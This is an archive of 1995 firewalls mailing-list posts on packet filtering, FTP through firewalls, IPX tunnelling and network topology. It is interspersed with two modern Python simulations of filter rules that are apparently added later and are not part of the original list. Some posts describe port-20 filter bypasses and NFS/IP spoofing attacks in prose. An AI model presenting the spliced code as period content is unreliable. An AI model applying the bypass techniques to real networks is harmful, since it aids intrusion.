>only to a port greater than 1023. I can even eliminate that by requiring
>only PASV connections (how I wound up connecting to Marcus' machine).

If connecting to ports > 1023 on Joe's machine isn't an issue, why even
bother with the dynamic filter? IMHO it's just a false sense of security.

--
mark
maf+@osu.edu

From firewalls-owner Mon Oct 16 01:43:28 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA03360 for firewalls-outgoing; Mon, 16 Oct 1995 01:33:43 -0700
Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA03353 for ; Mon, 16 Oct 1995 01:33:39 -0700
Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Mon, 16 Oct 1995 10:31:46 +0200
Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA06917; Mon, 16 Oct 95 10:31:37 +0200
Date: Mon, 16 Oct 1995 10:31:36 +0200 (EET)
From: Keinanen Vesa
To: Danny Cox
Cc: firewalls@greatcircle.com
Subject: Re: Modems and IPX tunnelling
In-Reply-To: <6373.9510131028@gmap.leeds.ac.uk>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Too open UDP access to your net is a problem, because you don't know
where your RPC services live. In your case you can allow UDP packets
w. port 213 (IP Tunneling) into your Netware server, and that doesn't
risk the RPC services you run on your Unix boxes.
But you should be very worried about security on the IPX and Netware
services level. You don't get any IPX services level filtering on your
Firewall router. The router only passes UDP port 213 through and has no
idea what's inside. In this case there can be anything that IPX can carry.

The next point for filtering is the tunneling endpoint, your Netware
server. Plain NW 3.11 or NW 4.x with IP tunneling doesn't do any service
based filtering. Installing Novell's MultiProtocolRouter on your Netware
server may help, don't know for sure.

So the problems are not on the IP level but on the IPX and Netware
services level. If you know that Netware services are secure, then just
go on :-) (I don't know how secure an environment Netware is).

If you really need to pass IP tunneling through, you had better do some
host based filtering on your firewall router: allow UDP 213 only FROM the
few hosts you know you can trust INTO your tunneling endpoint. And even
that may be too open, because you are not opening single host access but
an IPX routing tunnel.

You will sleep a lot better if you find a setup where you can do some IPX
address and service level filtering on incoming traffic.
VK

--
Vesa Keinanen     Nasilinnankatu 24 D, 33210 Tampere, Finland
Relevantum Oy     Phone +358 31 2147200, Fax +358 31 2147402

From firewalls-owner Mon Oct 16 04:00:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA05192 for firewalls-outgoing; Mon, 16 Oct 1995 03:47:59 -0700
Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA05184 for ; Mon, 16 Oct 1995 03:47:12 -0700
Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Mon, 16 Oct 1995 12:44:53 +0200
Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA10128; Mon, 16 Oct 95 12:44:47 +0200
Date: Mon, 16 Oct 1995 12:44:46 +0200 (EET)
From: Keinanen Vesa
To: Danny Cox
Cc: firewalls@greatcircle.com
Subject: Re: Modems and IPX tunnelling
In-Reply-To: <6856.9510160914@gmap.leeds.ac.uk>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > I would suggest that you do your ipx tunnelling outside the firewall -
> > put your Netware Server between the firewall router and your provider's
> > router (DMZ). Allow IPX through the firewall router and block it through
> > the provider's router. Allow IP/UDP and IP/TCP through the provider's router
> > and block IP/UDP through the firewall router. Should be safe enough....
>

Something like this:

                 IPX                      IPX in IP
            <- - - - - ->          < - - - - - - - - - - >
   Other NW-servers+        Firewall                       provider
   NW workstations  ------- router ------ +IPtunnel ------ router ---- outside

To get real use of this setup you have to "strengthen" it a bit:

 * The "External" NW server is vulnerable, so strip it to handle only
   tunneling
 * Use a smart Firewall router where you can do IPX address and Netware
   service based filtering. Let only the traffic out which is really
   necessary. Limit also the services which you advertize out (SAP
   filtering).
VK

From firewalls-owner Mon Oct 16 06:00:17 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA07219 for firewalls-outgoing; Mon, 16 Oct 1995 05:52:55 -0700
Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA07212 for ; Mon, 16 Oct 1995 05:52:52 -0700
Received: from smtpinet.aspensys.com (smtpgate.aspensys.com) by aspensys (5.0/SMI-SVR4) id AA15226; Mon, 16 Oct 1995 08:46:51 +0500
Received: from ccMail by smtpinet.aspensys.com (SMTPLINK V2.10.08) id AA813859144; Mon, 16 Oct 95 08:54:58 EST
Date: Mon, 16 Oct 95 08:54:58 EST
From: "Jim Meritt"
Message-Id: <9509168138.AA813859144@smtpinet.aspensys.com>
To: firewalls@greatcircle.com, Scott Surguine
Cc: surguine@teal.csn.net
Subject: Re: Question: Telnet & Packet Filtering
content-length: 493
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This sounds really odd. When you say "telnet only", what exactly do you
mean? Only connections to external in.telnetd?

Use dumb terminals - that'll do it.

Jim Meritt

______________________________ Reply Separator _________________________________
Subject: Question: Telnet & Packet Filtering
Author:  Scott Surguine at SMTPINET
Date:    10/13/95 8:21 PM

I would like to allow telnet OUTGOING ONLY across the Cisco. Which is the
best way to accomplish this?
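An added illustration, not any poster's router configuration, of the filter rules this thread keeps returning to: a first-match packet-filter evaluator with an 'established' flag, applied to Surguine's outgoing-only telnet, the anti-spoofing and mail/news rules of Colin Campbell's layered design, the single-peer UDP 213 rule from the IPX tunnelling thread, and Colin's trick of running the same list on the bastion so that any bastion reject flags a bypassed outer router. All addresses are constructed documentation-range values; the `established` rule matches only on the TCP ACK bit, which is what Padgett's "no, I do not mean via established" remark is about.

```python
# Added illustration for this thread, not anyone's posted router config.
# Constructed addresses: 192.0.2.0/24 is "inside", 192.0.2.1 the bastion,
# 192.0.2.20 the Netware tunnel endpoint, 198.51.100.9 a trusted tunnel
# peer and 203.0.113.0/24 "outside".
import ipaddress
from dataclasses import dataclass
from typing import List, Sequence, Tuple

Net = ipaddress.IPv4Network
ANY = ipaddress.ip_network("0.0.0.0/0")
INSIDE = ipaddress.ip_network("192.0.2.0/24")
BASTION = ipaddress.ip_network("192.0.2.1/32")
NW_SERVER = ipaddress.ip_network("192.0.2.20/32")
TUNNEL_PEER = ipaddress.ip_network("198.51.100.9/32")


@dataclass(frozen=True)
class Packet:
    proto: str          # "tcp" or "udp"
    src: str
    dst: str
    sport: int
    dport: int
    ack: bool = False   # TCP ACK bit; this is all that 'established' looks at


@dataclass(frozen=True)
class Rule:
    action: str                        # "permit" or "deny"
    proto: str                         # "tcp", "udp" or "ip" (either)
    src: Net
    dst: Net
    dports: Tuple[int, int] = (0, 65535)
    established: bool = False          # match only TCP segments with ACK set

    def matches(self, p: Packet) -> bool:
        if self.proto != "ip" and self.proto != p.proto:
            return False
        if ipaddress.ip_address(p.src) not in self.src:
            return False
        if ipaddress.ip_address(p.dst) not in self.dst:
            return False
        if not self.dports[0] <= p.dport <= self.dports[1]:
            return False
        if self.established and not (p.proto == "tcp" and p.ack):
            return False
        return True


def evaluate(rules: Sequence[Rule], p: Packet) -> str:
    """First match wins; anything unmatched is denied, as on a Cisco list."""
    for r in rules:
        if r.matches(p):
            return r.action
    return "deny"


# List applied inbound on the external router's outside interface.
# Order matters: the anti-spoofing deny must precede the 'established' permit,
# otherwise an ACK-flagged packet with a forged inside source would pass.
INBOUND_RULES: List[Rule] = [
    Rule("deny", "ip", INSIDE, ANY),                       # spoofed inside source
    Rule("permit", "tcp", ANY, INSIDE, established=True),  # replies to sessions opened inside
    Rule("permit", "tcp", ANY, BASTION, (25, 25)),         # mail to the bastion
    Rule("permit", "tcp", ANY, BASTION, (119, 119)),       # news to the bastion
    Rule("permit", "udp", TUNNEL_PEER, NW_SERVER, (213, 213)),  # IPX-in-IP, one trusted peer only
]
# The implicit deny covers everything else, including new inbound telnet (SYN, no ACK).


def bastion_bypass_alerts(rules: Sequence[Rule], seen: Sequence[Packet]) -> List[Packet]:
    """Colin's double-check: the bastion runs the same list as the outer router,
    so a packet the bastion rejects should never have reached it at all."""
    return [p for p in seen if evaluate(rules, p) == "deny"]


def demo() -> dict:
    reply = Packet("tcp", "203.0.113.5", "192.0.2.10", 23, 1234, ack=True)   # return traffic of an outgoing telnet
    new_in = Packet("tcp", "203.0.113.5", "192.0.2.10", 40000, 23)          # new inbound telnet attempt
    spoof = Packet("tcp", "192.0.2.7", "192.0.2.10", 23, 1234, ack=True)     # outside packet claiming an inside source
    mail = Packet("tcp", "203.0.113.5", "192.0.2.1", 40001, 25)
    # The weakness the thread circles around: 'established' is stateless, so any
    # ACK-flagged segment to an inside host passes whether or not a session exists.
    stray_ack = Packet("tcp", "203.0.113.5", "192.0.2.10", 40002, 1500, ack=True)
    return {
        "reply": evaluate(INBOUND_RULES, reply),          # permit
        "new_in": evaluate(INBOUND_RULES, new_in),        # deny
        "spoof": evaluate(INBOUND_RULES, spoof),          # deny
        "mail": evaluate(INBOUND_RULES, mail),            # permit
        "stray_ack": evaluate(INBOUND_RULES, stray_ack),  # permit (hence the call for real tracking)
        "bypassed": bastion_bypass_alerts(INBOUND_RULES, [mail, new_in]),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```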
From firewalls-owner Mon Oct 16 06:44:07 1995
Date: Mon, 16 Oct 1995 09:32:42 -0400 (EDT)
From: John Capo
To: cooker@ua.pt (Fernando Cozinheiro)
Cc: firewalls@GreatCircle.COM, cooker@zeus.ci.ua.pt
Subject: Re: ARPWatch under FreeBSD
In-Reply-To: <199510142138.AA138656696@zeus.ci.ua.pt> from "Fernando Cozinheiro" at Oct 14, 95 09:38:16 pm

Fernando Cozinheiro writes:
>
> Dear friends:
>
> A few days ago, I saw on this mailing list several references to
> ArpWatch, and I tried to install it under FreeBSD. After small
> modifications to the program, I succeeded in compiling it.
>
> Whenever I run it, messages like "arpwatch: pcap open:
> /dev/bpf0: Device not configured" appear in the syslog output file. Has
> anyone already succeeded in using the ArpWatch program under FreeBSD?
>

I have never used arpwatch but `/dev/bpf0: Device not configured' probably
indicates that your kernel was not built with packet filters enabled. Cruise
down to the end of your kernel config file and you will see

    pseudo-device   loop
    pseudo-device   ether
    ...
    pseudo-device   blah

Add

    pseudo-device   bpfilter   N

where N is the number of simultaneous packet filters you want to use. Config,
build, and install the new kernel.
John Capo                          IRBS Engineering
                                   High performance FreeBSD systems

From firewalls-owner Mon Oct 16 07:00:41 1995
Date: Mon, 16 Oct 1995 09:48:57 -0400
From: wbunting@ch.inri.com (Bill Bunting)
To: sgcccdc@citec.qld.gov.au (Colin Campbell), matt@uts.EDU.AU (Jas)
Cc: firewalls@GreatCircle.COM
Subject: Re: Various FTPs

At 09:51 AM 10/16/95 EST, Colin Campbell wrote:
>Hi,
>
>My mailer thinks Jas said:
>>
>> Scott Barman wrote this...
>>
>> > On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote:
>>
>> >> I agree with Marcus concerning the problems in FTP & possibly IPV6
>> >> will repair/replace it. For now I suspect that the answer is a
>>
>> > I have been "observing" the output of the IETF for IPv6 and have seen
>> > nothing regarding changing ftp. It seems their concerns are a larger
>> > address space and security. I don't think I'm alone in my desire to see
>> > something replace it and, as Marcus Ranum said about himself in a previous
>> > note, I'm not "big" enough to try to force a change!
>>
>> well why don't we put our collective heads together and make a firewall
>> friendly file transfer protocol? then we can have people write up the
>> code on different platforms (we have enough knowledge here for almost
>> every possible conceivable platform), and GPL the stuff. well? any
>> takers? myself personally I'm in.
>>
>
>Why doesn't PASV do the trick?
>
>Colin
>
>

Here is a clip from an earlier posting of mine. The problem is how to do FTP
when both sides require PASV, as is the case with many firewalls (i.e.
firewall to firewall FTP is the problem).

Internal users are allowed to use FTP to login to non-firewall-protected sites
using passive FTP. However, in order to have an FTP session, one of the two
sides must allow arbitrary port connections. If two firewall-protected sites
want to talk FTP, one of the two sides must allow arbitrary ports. With our
firewall, this is not allowed.

Here is what it looks like (to simplify, TIS fwtk proxy not shown):

Client tries passive mode...

  C-|----------21-control-connection---|-> S
  C-|---21---PASV Command--------------|-> S
  C-|------arbitrary-port-for-data---->| S   (blocked by server side firewall)

Client tries PORT command....

  C-|----------21-control-connection---|-> S
  C-|---21-PORT--Command---------------|-> S
  C |<------arbitrary-port-for-data----|- S  (blocked by client side firewall)

regards,
-Bill.
 ---------------------------------------
| Bill Bunting, Software Engineer       |
|Inter-National Research Institute, Inc.|
| 1441 Crossways Boulevard, Suite 102   |
| Chesapeake, Virginia 23320            |
| V(804)424-8675  F(804)420-4262        |
| (wbunting@inri.com)                   |
| (bunting@cs.odu.edu)                  |
| http://www.cs.odu.edu/~bunting        |
 ---------------------------------------

From firewalls-owner Mon Oct 16 07:30:23 1995
Date: Mon, 16 Oct 1995 10:37:43 -0700
From: janken@rust.net (Kenneth J. Stephens)
To: Bill Husler
Cc: firewalls@GreatCircle.COM
Subject: Re: Firewall1 Comparison -Reply

I think Bill Husler said:
>Our local SunSoft rep just gave us a presentation on FW-1 and it seems
>that FW-1 allows you to manage Cisco routers as well as FW-1 Filters (for
>application gateway and Dynamic packet filtering). This would provide
>both levels and on separate boxes while centralizing administration.
>Sound kinda cool.
>Bill

Do you really think it is a good idea to:

1. Keep your router passwords in your firewall so it can remote update your
   router configuration?

2. Send your router passwords over the net for remote update of your router
   configuration?

3. Allow remote update of your router configuration in any case, if you can
   avoid it?

The whole concept of "It is easy" vs. "Is it secure" lies in this type of
"feature." I vote no to the above questions. Yes; it does make my life more
difficult. IMO the increased security level is worth the extra work.

My $.02.

Ken

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]                                                                        []
[] Ken Stephens      Senior Capacity Planner/Data Security Officer        []
[] email: Ken_Stephens@miconsulting.com        Voice (313) 876-5081       []
[] Michigan Employment Security Commission (MESC)  Fax (313) 876-6827     []
[] 7th Fl. I.S.                                                           []
[] 7310 Woodward Ave                                                      []
[] Detroit, MI 48202                                                      []
[]                                                                        []
[] Millennium Consulting           Your Security Policy is only           []
[] 28234 Diesing Dr.               as strong as your organization's       []
[] Madison Heights, MI 48071       commitment to it.                      []
[]                                                                        []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Mon Oct 16 08:44:50 1995
Date: Mon, 16 Oct 95 11:33:15 EST
From: "Dave Druitt"
To: mah@ic.co.at, Anton J Aylward
Cc: firewalls@greatcircle.com
Subject: Re[2]: WE THE PEOPLE "....want the facts to make informed in

like the web of trust idea, but there are simpler ways. The most obvious one
is to only accept postings from subscribers.
list "manager" has every right to delete someone who abuses the aims and
charter. Having a front-end filter which only allows posting by subscribers
is one way to do this. Without needing all the PGP technology.
______________

Hear, hear!

Dave Druitt
__________________
'What's all this about bending the other cheek?'

From firewalls-owner Mon Oct 16 09:04:12 1995
Date: Mon, 16 Oct 1995 08:36:22 -0700
From: Brian Murrell
To: firewalls@GreatCircle.COM, jonw@mntcmp2.demon.co.uk
Subject: Re: Firewalls

> We are planning to have a public access web/ftp site on the outside of a
> firewall. This machine does not need to be 100% secure. Our internal office net
> will also be connected to the same leaseline and this net will need to be secure.
> We plan to use packet filters on the Ciscos and application proxys on the
> bastion machine:
>
>
> ISP     +-----------+                        +-----------+
> Lease   |   Cisco   |                        |  Bastion  |  Application proxys
> -----   |   2501    |------------------------|  machine  |  primary DNS
> Line    |           |            |           |           |
>         +-----------+            |           +-----------+
>                                  |
>                                  |           +-----------+
>                                  |           |  ftp/web  |  Insecure
>                                  |-----------|  machine  |  Public
>                                  |           |           |  Access machine
>                                  |           +-----------+
>                                  |
>                            +-----------+
>                            |   Cisco   |  Dual Homed
>                            |   2514    |  Gateway
>                            |           |
>                            +-----------+
>                                  |
>                                  |
>  -------------------------------|---------------------------  Secure Internal
>         |                   |                       |           TCP/IP Network
>   +-----------+       +-----------+           +-----------+
>   |  Machine  |       |  Machine  |  .....    |  Machine  |
>   |     1     |       |     2     |           |     n     |
>

I've never understood why this kind of configuration is ever contemplated.
You've just put all of your eggs into one basket. If that 2514 ever goes, so
does all security. Why not use something more along the lines of...

 ISP     +-----------+
 Lease   |   Cisco   |
 -----   |   2501    |-----------
 Line    |           |          |
         +-----------+          |
                                |
                                |           +-----------+
                                |           |  ftp/web  |  Insecure
                                |-----------|  machine  |  Public
                                |           |           |  Access machine
                                |           +-----------+
                                |
                          +-----------+
                          |   Cisco   |   Dual Homed
                          |   2514    |   Gateway
                          |           |
                          +-----------+
                                |
                                |
                          +-----------+
                          |  Bastion  |   Application proxys
                          |  machine  |   primary DNS
                          |           |
                          +-----------+
                                |
                                |
 -------------------------------|---------------------------  Secure Internal
        |                   |                       |           TCP/IP Network
  +-----------+       +-----------+           +-----------+
  |  Machine  |       |  Machine  |  .....    |  Machine  |
  |     1     |       |     2     |           |     n     |

Now even if the 2514 fails (or is mis-configured) there is still a NON-ROUTING
bastion host to compromise before the internal network falls.

b.

--
Brian J. Murrell                                   murrell@bctel.net
BCTel Advanced Communications                      brian@ilinx.com
Vancouver, B.C.                                    brian@wimsey.com
604 454 5261

From firewalls-owner Mon Oct 16 09:17:16 1995
Date: Mon, 16 Oct 1995 10:24:37 -0400
From: *Hobbit*
To: firewalls@greatcircle.com
Subject: Correction

Further investigation tells me that the firewall[s] in question -- that which
can be hopped by coming from port 20 -- is *NOT* a Firewall-1. It is a
different kind of packet filter. The client, myself, or something in between
was confused. FW-1 in theory would not be open to this kind of attack because
of the dynamic filtering. Another lesson against the blind "see if you can get
in" type of evaluation.

Still, this sort of shenanigan does bypass a good number of packet filters out
there, so keep an eye on those X servers and nfsds and such...
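Bill Bunting's PASV/PORT diagram and Hobbit's port-20 note describe the same property of a stateless packet filter from two sides: the hole punched so that active-mode FTP data connections get in admits any connection that merely claims source port 20. The following is an added illustration (not code from either poster) that models a stateless source-port-20 rule beside the kind of dynamic filter Hobbit credits FW-1 with, which only admits the data connection a PORT command actually announced. The hosts, addresses and the PORT command are constructed.

```python
"""Stateless vs. dynamic filtering of active-mode FTP data connections.

Added illustration, not code from the list posts. Hosts and commands are
constructed; addresses use 10/8 and 192.0.2/24 (documentation) space.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Syn:
    """The first packet of an inbound TCP connection attempt."""
    src: str
    sport: int
    dst: str
    dport: int


PORT_RE = re.compile(
    r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$")


def parse_port(cmd: str):
    """Decode an RFC 959 PORT command (h1,h2,h3,h4,p1,p2) into (ip, port).
    Returns None for a malformed command or an out-of-range octet."""
    m = PORT_RE.match(cmd.strip())
    if not m:
        return None
    n = [int(x) for x in m.groups()]
    if any(v > 255 for v in n):
        return None
    return f"{n[0]}.{n[1]}.{n[2]}.{n[3]}", n[4] * 256 + n[5]


INSIDE = {"10.1.1.5", "10.1.1.7"}   # constructed: the protected hosts


def stateless_allow(p: Syn) -> bool:
    """The usual hole punched for active FTP: let any connection whose
    source port is 20 reach an unprivileged port on an inside host. The
    filter cannot tell an FTP data channel from anything else."""
    return p.dst in INSIDE and p.sport == 20 and p.dport > 1023


class DynamicFilter:
    """Admits an inbound data connection only if the inside client announced
    it with a PORT command on its control channel to that server."""

    def __init__(self):
        self.expected = set()   # (server, 20, client, port) tuples

    def see_control(self, client: str, server: str, line: str) -> None:
        parsed = parse_port(line)
        # Only the connection back to the issuing client is pre-approved;
        # a PORT naming some other host is ignored.
        if parsed and parsed[0] == client and client in INSIDE:
            self.expected.add((server, 20, client, parsed[1]))

    def allow(self, p: Syn) -> bool:
        key = (p.src, p.sport, p.dst, p.dport)
        if key in self.expected:
            self.expected.discard(key)   # one data connection per PORT
            return True
        return False


def compare(client="10.1.1.5", server="192.0.2.10", intruder="192.0.2.99"):
    """Run the same three inbound SYNs through both filters; returns a dict
    of (stateless, dynamic) verdicts keyed by a short label."""
    dyn = DynamicFilter()
    # Constructed control-channel line: client will listen on 4*256+1 = 1025.
    dyn.see_control(client, server, "PORT 10,1,1,5,4,1")
    cases = {
        "ftp-data announced by PORT": Syn(server, 20, client, 1025),
        "port 20 -> X server (6000)": Syn(intruder, 20, "10.1.1.7", 6000),
        "port 20 -> nfsd (2049)": Syn(intruder, 20, client, 2049),
    }
    return {label: (stateless_allow(s), dyn.allow(s))
            for label, s in cases.items()}


if __name__ == "__main__":
    for label, (stateless, dynamic) in compare().items():
        print(f"{label:28s} stateless={'ALLOW' if stateless else 'deny':5s}"
              f"  dynamic={'ALLOW' if dynamic else 'deny'}")
```

Only the first case is admitted by both filters; the stateless rule also lets the two probes through, which is exactly the class of filter Hobbit says gets hopped.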
_H*

From firewalls-owner Mon Oct 16 10:35:08 1995
Date: Mon, 16 Oct 95 10:15:27 -0700
From: cbenson@boomer.dpc.com (Chuck Benson)
To: firewalls@greatcircle.com, hobbit@avian.org
Subject: Re: Correction

ok

From firewalls-owner Mon Oct 16 10:45:25 1995
Date: Mon, 16 Oct 95 10:17:41 -0700
From: cbenson@boomer.dpc.com (Chuck Benson)
To: firewalls@greatcircle.com, hobbit@avian.org
Subject: Confirm

ok 1A5863

From firewalls-owner Mon Oct 16 11:01:12 1995
Date: Mon, 16 Oct 1995 13:28:43 -0400
From: "Bryan D. Boyle"
To: firewalls@GreatCircle.COM
Subject: Re: Firewall1 Comparison -Reply
In-Reply-To: janken@rust.net (Kenneth J. Stephens) "Re: Firewall1 Comparison -Reply" (Oct 16, 10:37am)
X-Phone: (908) 730-3338
X-Saying: Strange problems call for strange solutions.

On Oct 16, 10:37am, Kenneth J. Stephens wrote:
> Subject: Re: Firewall1 Comparison -Reply
> I think Bill Husler said:
> >Our local SunSoft rep just gave us a presentation on FW-1 and it seems
             ^^^^^^^^^^^
Obviously unbiased...:)

>
> Do you really think it is a good idea to:
>
> 1. Keep your router passwords in your firewall so it can remote update your
> router configuration?
>
> 2. Send your router passwords over the net for remote update of your router
> configuration?
>
> 3. Allow remote update of your router configuration in any case, if you can
> avoid it?
>
> The whole concept of "It is easy" vs. "Is it secure" lies in this type of
> "feature." I vote no to the above questions. Yes; it does make my life
> more difficult. IMO the increased security level is worth the extra work.

I would echo a resounding "AMEN" to the last paragraph. I think that there are
a number of dynamics at work here:

1. Is your opinion of a firewall one of a continuously morphing 'security'
   checkpoint?

2. Is your opinion of a firewall a means to execute company access and
   security policy?

I would opine that if you view this technology as 1., then a different set of
operational parameters would apply than if 2. was your charter.

A fully functioning firewall, once debugged, configured, and stable, should
probably be about as static a configuration as possible; alerts, new
technology, and the like notwithstanding. Changes should probably only be made
after the most rigorous examination of the technology, benefits to opening up
the ports or whatever to the great unwashed populace (PUP).

But, centralizing the control? Nah...that is how they managed to overthrow the
czar...:)

--
Bryan D. Boyle   | EMAIL: bdboyle@erenj.com
908-730-3338     | PAGE: bboyle@apt1.pagemart.com
#include         | http://www.access.digex.net/~bdboyle/index.html

"It seems that 'national security' is the root password to the Constitution.
As with any dishonest superuser, the best countermeasure is strong encryption."
                                                        -Phil Karn

From firewalls-owner Mon Oct 16 11:53:33 1995
Date: Mon, 16 Oct 1995 12:28:02 -0600
From: mulligan@future.incog.com
Reply-To: mulligan@incog.com
To: "Dave Druitt"
Cc: mah@ic.co.at, Anton J Aylward, firewalls@greatcircle.com
Subject: Re: Re[2]: WE THE PEOPLE "....want the facts to make informed in
In-Reply-To: Your message of "Mon, 16 Oct 1995 11:33:15 EST." <9509168138.AA813868592@GWFX1.sysorex.com>

But there is no way to ensure that the post is actually coming from a
subscriber and not someone pretending to be one, and what about folks behind
exploders?
geoff

From firewalls-owner Mon Oct 16 12:13:31 1995
Date: Mon, 16 Oct 1995 14:04:51 -0400
From: Guru Sundararaman
Organization: Bankers Trust Company
Newsgroups: btco.list.firewalls
Subject: external web server administration
ReSent-From: "Todd S. Aven"
ReSent-To: firewalls@greatcircle.com

One of the popular implementations of a firewall seems to be that of a bastion
host with two interfaces - one to the Internet and the other to your network,
and each Internet service supported by an application-level proxy.

(1) I would like to hear experiences on how Web server(s) are administered
(mainly in areas of monitoring and content population), especially when it is
on the external side of a dual interfaced firewall, and the administrators and
content authors are on the internal side of the firewall.

(2) If the external Web server is a Commerce Server (SSL-based), isn't there a
security risk in keeping it on the external segment of the Firewall - given
that it needs to contain sensitive information, like user passwords and
encryption keys? I would like to know how others have designed their network
to support SSL applications.

Thanks,
-Guru
gurus@btco.com

From firewalls-owner Mon Oct 16 12:31:23 1995
Date: Mon, 16 Oct 95 12:27:08 PDT
From: garyh@sbei.com (Gary Hasenfus)
Reply-To: garyh@sbei.com
To: firewalls@GreatCircle.COM
Cc: garyh@sbei.com
Subject: Looking For The Numbers

Budgeting time is here again and that requires that I scare my upper
management into supporting good network security for our site. To help with
this I am seeking references (URLs preferred) to data that supports the two
points listed below. As a long time lurker on this list I know I have seen
such things before but can't seem to find them at the moment.

-o- The risk of intrusion is non trivial.
    - Numbers on the quantity of reported attacks
    - Figures of merit on how many victim sites report attacks.
    - Case studies of intrusions at small cap companies.
    - Other related statistics.

-o- The down side of an attack can be substantial.
    - Numbers on the dollar cost of attacks.
    - Statistics on what attackers do once a site is breached.
    - Disaster case studies.
    - Other related statistics

If you respond to me directly I will summarize for the list.

Thanks,
garyh@sbei.com

/-----------------------\_/----------------------------------\
| SBE Inc.              | Internet: garyh@sbei.com           |
| Gary D. Hasenfus      | UUNET: uunet.uu.net!sbei!garyh     |
| 4550 Norris Canyon Rd.| Voice: (510) 355-7726              |
| San Ramon, Ca. 94583  | FAX: (510) 355-2020                |
\_______________________/-\__________________________________/
--EOM--

From firewalls-owner Mon Oct 16 14:04:38 1995
Date: Mon, 16 Oct 1995 13:48:38 -0700
From: sjones@Aptech.com
To: firewalls@greatcircle.com
Subject: FTP

> > On Fri, 13 Oct 1995 11:18:13 -0400 (EDT), "Scott Barman" wrote:
> > ... I don't think I'm alone in my desire to see
> > something replace it and, as Marcus Ranum said about himself in a previous
> > note, I'm not "big" enough to try to force a change!
>
> How about 15,000 Firewalls readers? ;) I think if Marcus added a new
> FTP daemon to the FWTK, we would love to implement it along side our
> old FTP connections until it became a de facto standard. Add in the
> FWTK-User readers, and I think we could be "big" enough over time.
>
> If we are the ones to control access to the Internet, we can help dictate
> its use, right?

Just do it.
From firewalls-owner Mon Oct 16 14:49:36 1995
Date: Sat, 14 Oct 1995 11:21:14 -0400 (EDT)
From: long-morrow@CS.YALE.EDU
To: ken@bridge.com, steveg@cseic.saic.com
Cc: firewalls@greatcircle.com
Subject: Re: Various FTPs

Ken Hardy wrote:

>HTTP might do for an outgoing-only anonymous FTP replacement. But HTTP
>is unidirectional; I can set up an FTP server to allow people to send
>me files, but not so with HTTP, and I can configure an FTP server to

There is a draft proposal to add to HTTP and HTML a Forms based file upload
capability.

>change the modes on received files so that even the sender cannot
>access them again. Anyone could conceivably fetch the file off my
>friend's HTTP server meant for me, passwords notwithstanding.

Certainly someone could provide this capability on their Web server by
creating an appropriate setuid C or perl program. Anything is possible with
programming.... (better living through programming).
- Morrow

From firewalls-owner Mon Oct 16 15:16:00 1995
Date: Mon, 16 Oct 1995 15:57:02 -0400 (EDT)
From: Charles Kaplan
To: firewalls@greatcircle.com
Subject: Application level vs Packet filtering (fwd)

---------- Forwarded message ----------
Date: Sat, 14 Oct 1995 20:45:35 -0400 (EDT)
From: Charles Kaplan
To: firewalls@greatcircle.com
Subject: Application level vs Packet filtering

I concur that combining the two yields both overlap, but also performance
advantages. By using packet filters on the 'fringes' of the gateway
(internally and externally), you can eliminate (at a high rate) known bad
sites. This extends to the level of blocking employee access from sites such
as playboy.com, or blocking public access workstation xx.xxx.xxx.xx from
accessing the web. These functions could operate on separate platforms, i.e.
TIS FWTK and a router, or on the same platform like with BorderWare or
BlackHole.

One nice benefit of combining the two technologies onto one platform is that
you can tell a user why they are being denied access. I.e. in BorderWare and
BlackHole if you are not in a filter list to be allowed web access, the
application (since it does look at every packet dis-assembled) can (and does)
present a web page informing you that you are being denied access. A strict
packet filter would just drop the connection, and leave the user thinking the
network was down or something.

-Charles Kaplan (yes, I am a BorderWare reseller)

for more information check out
www.border.com    800-334-8195 (BorderWare)
www.milkyway.com  613-596-5549 (BlackHole)

From firewalls-owner Mon Oct 16 15:24:52 1995
Date: Thu, 12 Oct 1995 18:42:24 -0500
From: jim@SmallWorks.COM (Jim Thompson)
To: charisse@SmallWorks.COM, firewalls@greatcircle.com, jes@SmallWorks.COM, steve@SmallWorks.COM
Subject: Brewer et al. on ``Basic Flaws in Internet Security and Commerce''

Forwarded-by: Wendell Craig Baker
From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
Date: Mon, 09 Oct 1995 14:26:06 -0700

Basic Flaws in Internet Security and Commerce

We believe that the current focus on secure session-layer protocols and
sufficient randomness have obscured more fundamental flaws in end-to-end
security. In particular, secure end-to-end transactions require two parts: a
secure protocol to communicate over untrusted channels, and trusted code at
both endpoints. The latter problem has received less attention, but destroys
security regardless of the quality of the protocols or of the random numbers.

We have implemented a series of related attacks utilizing IP spoofing:

 * We can spoof NFS to patch binaries on the fly if we are on any subnet
   between the NFS client and NFS server.
   We used this to turn legitimate Netscape browsers into versions that used
   a fixed key (known only to us), thus invisibly eliminating security.
 * The same trick allows us to defeat Kerberos security by attacking kinit.
 * We can also spoof NFS file-handle lookups, so that we can replace any file
   (such as .login) with another file that runs with root access privileges
   (even if the requesting user cannot).

These work because the trusted path to executables is really not trustworthy
